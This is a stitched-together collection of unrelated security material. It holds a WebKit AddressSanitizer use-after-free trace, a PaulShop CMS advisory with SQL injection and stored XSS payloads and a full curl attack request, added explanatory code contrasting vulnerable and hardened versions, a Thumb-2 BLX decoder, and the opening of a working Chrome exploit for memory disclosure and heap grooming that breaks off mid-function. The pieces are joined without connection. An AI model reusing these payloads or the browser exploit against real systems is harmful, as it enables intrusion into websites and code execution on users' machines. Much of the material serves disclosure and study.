#5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3)
#6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)
#7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba)
#8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8)
#9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)
#10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)
#11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185)
#14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)
#15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6)
#16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f)
#17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d)
#18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2)
#19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)
#20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)
#21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)
#22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)
#23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)
#24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)
#25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)
#26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)
#27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)
#28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)
previously allocated by thread T0 here:
#0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)
#7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)
#8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)
#9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)
#10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3)
#11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)
#12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)
#13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)
#14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)
#15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)
#16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)
#17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)
#18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)
#19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)
#20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)
#22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const
Shadow bytes around the buggy address:
0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==728==ABORTING
-->
# Exploit Title: PaulShop CMS - Sql Injection and stored XSS
# Date: 07/23/2017
# Exploit Author: BTIS Team (http://www.btis.vn)
# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
# Version: 03/27/2017
# Tested on: Apache/2.4.7 (Ubuntu)
# Contact: research@btis.vn
# Vendor contact: could not reach the vendor
1. Description
- SQL Injection on Search page with "q" parameter (GET)
- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode]
2. Examples
- SQL injection:
# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE]
# Payload:
- True condition: europe' and 1=1)-- -
- False condition: europe' and 1=0)-- -
- Stored XSS:
# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
# curl -X POST \
'http://localhost/shop/en/account?save=1' \
-b 'mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \
-d 'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save'
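Both findings are the same mistake: untrusted input spliced into a structured language (SQL for the search parameter, HTML for the profile fields) with no encoding for that context. What follows is an added example, not PaulShop's code (the vendor source is not on this page): each finding as the vulnerable construction beside a hardened one, driven by the advisory's own payloads. The table and column names, and the parenthesised LIKE clause that the `)-- -` suffix implies, are assumptions inferred from the payload, not taken from the product.

```javascript
// Added example, not PaulShop code. The query shape below is an assumption read
// off the payload: a closing `)` followed by `-- -` only produces a valid query
// if q lands inside a parenthesised clause of a MySQL statement.

// ---- 1. SQL injection via the search parameter q ----

// Vulnerable: q is spliced into the SQL text.
function buildSearchQueryVulnerable(q) {
  return "SELECT * FROM products WHERE (name LIKE '%" + q + "%') AND active = 1";
}

// Hardened: the SQL text is constant and q travels as a bound parameter
// (CodeIgniter's $this->db->query($sql, $params) does this; framework omitted here).
function buildSearchQuerySafe(q) {
  return {
    sql: "SELECT * FROM products WHERE (name LIKE ?) AND active = 1",
    params: ["%" + q + "%"],
  };
}

// What MySQL actually evaluates: `-- ` comments out the rest of the line
// (the trailing `-` in the payload keeps that required space from being trimmed).
function effectiveSql(sql) {
  return sql.replace(/--\s.*$/, "");
}

// ---- 2. Stored XSS in the profile fields ----

// Vulnerable: the saved field is echoed into an attribute value unencoded,
// so a leading `">` closes the attribute and the tag and starts a new element.
function renderProfileFieldVulnerable(name, value) {
  return '<input name="' + name + '" value="' + value + '">';
}

// Hardened: attribute-context encoding of every field before it reaches the page.
const ATTR_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}

function renderProfileFieldSafe(name, value) {
  return '<input name="' + escapeHtmlAttr(name) + '" value="' + escapeHtmlAttr(value) + '">';
}

// Number of tags in a rendered fragment; a single input field must yield exactly one.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}

// Payloads taken from the advisory above.
const SQLI_TRUE = "europe' and 1=1)-- -";
const SQLI_FALSE = "europe' and 1=0)-- -";
const XSS_FIRSTNAME = decodeURIComponent("BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E");
```

Running `effectiveSql(buildSearchQueryVulnerable(SQLI_TRUE))` shows why the advisory's pair of payloads is a boolean-based blind oracle: the two queries differ only in `1=1` versus `1=0`, so a difference in the result page confirms the injection without any error message. The hardened query never changes shape, whatever q contains.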
Quan Minh Tâm / Head of Technical Department
<mailto:tamqm@btis.vn> tamqm@btis.vn / 01284 211 290
CÔNG TY CÔNG NGHỆ BẢO TÍN (Bao Tin Technology Company)
028 3810 6288 – 028 38106289
5A Trần Văn Dư, Ward 13, Tân Bình District, Ho Chi Minh City
<http://www.btis.vn> www.btis.vn
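The exploit file that follows locates `get_elf_hwcap_from_getauxval` in Chrome's code by a byte pattern and then calls `get_dest_from_blx` on the word four bytes before it to recover the address of `dlsym`. The helper below is an added example, not code from the secmob/pwnfest2016 repository: it decodes a Thumb-2 BLX (encoding T2) immediate the same way the exploit does, adds the matching encoder so the decoder can be checked against known instruction words, and runs the pattern-then-BLX step over a constructed image. The base address, offsets and image contents are made up for the demonstration; only the ten-byte pattern is the one the exploit searches for.

```javascript
// Added example, not from secmob/pwnfest2016. Thumb-2 BLX, encoding T2:
//   halfword 1: 11110 S imm10H        halfword 2: 11 J1 0 J2 imm10L H (H = 0)
//   I1 = NOT(J1 XOR S), I2 = NOT(J2 XOR S)
//   target = Align(PC, 4) + SignExtend(S:I1:I2:imm10H:imm10L:00), PC = addr + 4
// `word` is the little-endian uint32 read at the instruction address, so
// halfword 1 is in the low 16 bits, exactly what read_uint32_unalign returns.

function decodeThumbBlx(addr, word) {
  const hw1 = word & 0xffff;
  const hw2 = (word >>> 16) & 0xffff;
  // Check the fixed opcode bits (including bit 12 = 0 and H = 0) before trusting the offset.
  if ((hw1 & 0xf800) !== 0xf000 || (hw2 & 0xd001) !== 0xc000) {
    throw new Error("not a Thumb-2 BLX at 0x" + (addr >>> 0).toString(16));
  }
  const S = (hw1 >> 10) & 1;
  const imm10H = hw1 & 0x3ff;
  const J1 = (hw2 >> 13) & 1;
  const J2 = (hw2 >> 11) & 1;
  const imm10L = (hw2 >> 1) & 0x3ff;
  const I1 = (J1 ^ S) ^ 1;
  const I2 = (J2 ^ S) ^ 1;
  let imm32 = (S << 24) | (I1 << 23) | (I2 << 22) | (imm10H << 12) | (imm10L << 2);
  if (S) imm32 |= ~0x1ffffff;          // sign-extend the 25-bit immediate to 32 bits
  const pc = ((addr + 4) & ~3) >>> 0;  // Align(PC, 4): BLX targets ARM state
  return (pc + imm32) >>> 0;
}

function encodeThumbBlx(addr, target) {
  const pc = ((addr + 4) & ~3) >>> 0;
  const imm32 = target - pc;
  if (imm32 & 3) throw new Error("BLX target must be 4-byte aligned");
  if (imm32 < -(1 << 24) || imm32 >= (1 << 24)) throw new Error("BLX offset out of range");
  const imm25 = imm32 & 0x1ffffff;
  const S = (imm25 >>> 24) & 1;
  const I1 = (imm25 >>> 23) & 1;
  const I2 = (imm25 >>> 22) & 1;
  const imm10H = (imm25 >>> 12) & 0x3ff;
  const imm10L = (imm25 >>> 2) & 0x3ff;
  const J1 = (I1 ^ 1) ^ S;             // J1 = NOT(I1) XOR S
  const J2 = (I2 ^ 1) ^ S;
  const hw1 = 0xf000 | (S << 10) | imm10H;
  const hw2 = 0xc000 | (J1 << 13) | (J2 << 11) | (imm10L << 1);
  return ((hw2 << 16) | hw1) >>> 0;
}

// The byte pattern the exploit searches for (start of get_elf_hwcap_from_getauxval).
const HWCAP_PATTERN = [0x03, 0x46, 0x18, 0xb1, 0x20, 0x46, 0x98, 0x47, 0x04, 0x46];

// Same step as the exploit: find the pattern in `image` (mapped at `base`) and
// decode the BLX that sits four bytes before it. Returns the call target or null.
function resolveCallBeforePattern(image, base, pattern) {
  outer: for (let i = 4; i + pattern.length <= image.length; i++) {
    for (let j = 0; j < pattern.length; j++) {
      if (image[i + j] !== pattern[j]) continue outer;
    }
    const off = i - 4;
    const word = (image[off] | (image[off + 1] << 8) | (image[off + 2] << 16) | (image[off + 3] << 24)) >>> 0;
    return decodeThumbBlx(base + off, word);
  }
  return null;
}

// Constructed sample image (not real Chrome code): a BLX to `target` immediately
// followed by the pattern, which is the layout the exploit assumes.
function buildSampleImage(base, blxOffset, target) {
  const img = new Uint8Array(0x100);
  const w = encodeThumbBlx(base + blxOffset, target);
  img[blxOffset] = w & 0xff;
  img[blxOffset + 1] = (w >>> 8) & 0xff;
  img[blxOffset + 2] = (w >>> 16) & 0xff;
  img[blxOffset + 3] = (w >>> 24) & 0xff;
  img.set(HWCAP_PATTERN, blxOffset + 4);
  return img;
}
```

Two words worth remembering when checking a decoder by hand: `f000 e806` at address 0x8000 is `blx 0x8010`, and `f7ff effe` is a BLX to its own address. The exploit's `get_dest_from_blx` does not verify that the word is a BLX at all; the opcode check here is what turns a wrong pattern hit into an exception instead of a bogus `dlsym` address.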
<html>
// Source: https://github.com/secmob/pwnfest2016/
<script>
function exploit(){
function to_hex(num){
return (num>>>0).toString(16);
}
function intarray_to_double(int_arr){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
uBuf[0]=int_arr[0];
uBuf[1]=int_arr[1];
return dBuf[0];
}
function str_to_double(str){//length of str must be 8
var dBuf = new Float64Array(1);
var u8Buf = new Uint8Array(dBuf.buffer);
for(var i=0;i<str.length;i++){
u8Buf[i] = str.charCodeAt(i);
}
return dBuf[0];
}
function double_to_array(value){
var uBuf = new Uint32Array(2);
var dBuf = new Float64Array(uBuf.buffer);
dBuf[0]=value;
return uBuf;
}
function gc(){
for(var i=0;i<0x100000/16;i++){
new String;
}
}
function getHiddenValue(){
var obj = {};
var oob = "/re/";
//oob = oob.replace("re","*".repeat(0x2000));
oob = oob.replace("re","*".repeat(0x100000));
var str = 'class x extends Array{'+oob+"}";
var fun = eval(str);
Object.assign(obj,fun);
return obj;
}
var obWin;
function makeOobString(){
var hiddenValue = getHiddenValue();
var magicStr = "bbbb";
var arr=[];
var str = 'class x extends Array{}';
for(var i=0;i<str.length;i++){
arr[i]=str.charCodeAt(i);
}
var ob = new Array(0x200);
ob.fill(0x31313131);
gc();
gc();
str=String.fromCharCode.apply(null,arr);
ob=ob.concat(0x32323232);
var fun = eval(str);
ob[2]=str;
ob[3]=ob;
Object.assign(fun,hiddenValue);
var oobString = fun.toString();
gc();
gc();
print("begin search");
var subStr = oobString.substr(0,0x8000);
var pos = subStr.indexOf(magicStr);
print("end search");
if(pos==-1){
print("find magic failed");
postMessage(false);
self.close();
print("unpossible");
throw "error";
}else{
print("find magic at "+pos);
}
oobString = oobString.substr(pos,ob.length*4);
obWin=ob;
return oobString;
}
var oobString = makeOobString();
print("get oob string successfully");
function print(){
console.log.apply(null,arguments);
/*document.write('<p >');
document.write.apply(document,arguments);
document.write("<p>");*/
}
function str2arr(str,len){//len must be a multiple of 4
if(len===undefined)
len = str.length;
var u8a = new Uint8Array(len);
for(var i=0;i<len;i++){
u8a[i] = str.charCodeAt(i);
}
return new Uint32Array(u8a.buffer);
}
function pArrayInHex(arr){
var result="<p style='font-size:8px'>";
for(var i=0;i<arr.length;i++){
result+=(arr[i]+0x100000000).toString(16).substr(-8);
result+=" ";
if(i%8==7)
result+="<p style='font-size:8px'>";
}
result+="<p>";
print(result);
//alert(result);
return result;
}
function pStrInHex(str){
//var result="<p style='font-size:8px'>";
var result="\n";
for(var i=0;i<str.length;i++){
var code = str.charCodeAt(i);
result+=(code+0x100).toString(16).substr(-2);
if(i%4==3)
result+=" ";
if(i%32==31)
// result+="<p style='font-size:8px'>";
result+="\n";
}
// result+="<p>";
result+="\n";
print(result);
return result;
}
function getObjAddr(obj){
obWin[0]=obj;
var value2= ((str2arr(oobString,4))[0]);
return value2>>>0;
}
var getObj24BitsAddr = function(){
var value=0;//declared in the closure so getAddr itself allocates nothing
var code = 0;
var i=0;
//don't allocate heap object
function getAddr(obj){
obWin[0]=obj;
value=0;
code = 0;
i=0;
for(i=2;i>=0;i--){
code = oobString.charCodeAt(i);
value = code+value*256;
}
return value;
}
return getAddr;
}();
var lengthInOldSpace = 0xfffffffc;
var abarr=new Array(800);
function sprayVM(){
var i=0;
var j=0;
try{
for(i=0;i<20;i++){
var u8 = new Uint8Array(0x10000000-0x500);
abarr[i]=u8;
}
}catch(e){}
try{
for(j=0;j<100;j++){
var u8 = new Uint8Array(0x8000000-0x500);
abarr[i+j]=u8;
}
}catch(e){}
print("allocate "+i+" 256M "+j+" 16M ")
function getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min)) + min;
}
delete abarr[getRandomInt(0,i)];
}
function getNewSpaceAddrs(){
/*var kMaxRegularHeapObjectSize =523776;// 507136;
var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
str+="%";*/
var objsInNewSpace = new Array(80);
for(var i=0;i<objsInNewSpace.length;i++){
//var xx=escape(str);
var xx = new Array(0x70000/4);
objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;
//make the new space layout more scattered
new Uint8Array(0x100000-0x500);
new Uint8Array(0x100000-0x500);
}
function compareNumbers(a, b) {
return a - b;
}
objsInNewSpace = Array.from(new Set(objsInNewSpace));
objsInNewSpace = objsInNewSpace.sort(compareNumbers);
return objsInNewSpace;
}
print("begin get new space address");
var objsInNewSpace = getNewSpaceAddrs();
while(objsInNewSpace.length<16){
objsInNewSpace = getNewSpaceAddrs();
print("new space addresses");
pArrayInHex(objsInNewSpace);
}
try{
sprayVM();
}catch(e){}
var selectedTrunk = 0;
var selectedStr = "";
function bruteForceFengShui(){
var huge_str = "x".repeat(0x100000-0x9000);//-0x9000
huge_str +="%";
var hold = new Array(100);
//var holdaddress = new Array(100);
for(var i=0;;i++){
var large = escape(huge_str);
var addr = getObjAddr(large);
//console.log(addr.toString(16) + " "+i);
if(i<hold.length){
hold[i]=large;
//holdaddress[i]=addr;
}
addr=(addr&0xfff00000)>>>0;
addr = addr-0x100000;
if(objsInNewSpace.indexOf(addr)!=-1){
selectedTrunk = addr;
selectedStr = large;
abarr.fill(1);
hold.fill(1);
//holdaddress.fill(1);
break;
}
if(i===150){
/*i=0;
print("tried 200 times");
abarr.fill(1);
try{
sprayVM();
}catch(e){};*/
postMessage(false);
close();
throw "exceed limits";
}
}
}
bruteForceFengShui();
//to avoid allocating memory later, initialize here
var nextTrunk = selectedTrunk + 0x100000;
//produce a large enough readable/writable memory region
var huge_str = "eval('');";
//8000 must not be too large; a larger value makes new_space grow
for(var i=0;i<8000;i++) huge_str += 'a.a;';
huge_str += "return 10;";
var huge_func = new Function('a',huge_str);
huge_func({});
function fillNewSpace(origObj){
//first object in new space at 0x8100, new spaces layout
//0x40000
//0x37f00
//.....
//0x40000
var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25
var gap = gap+"%";
//flat gap
gap.substr(0,100);
var fillstr = "%20a".repeat((0x40000-12)/4);
fillstr = escape(fillstr);
var addr=0;
for(var i=0;i<0x100;i++){
addr = getObj24BitsAddr(origObj);
if((addr&0xfffff)===0x8101)
origObj=escape(gap);
else
origObj=unescape(fillstr);
}
}
function findNewSpace(){
var kMaxRegularHeapObjectSize =523776;// 507136;
var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
str+="%";
for(var i=0;;i++){
var xx=escape(str);
var straddr = getObjAddr(xx);
addr=(straddr&0xfff00000)>>>0;
if(addr===selectedTrunk){
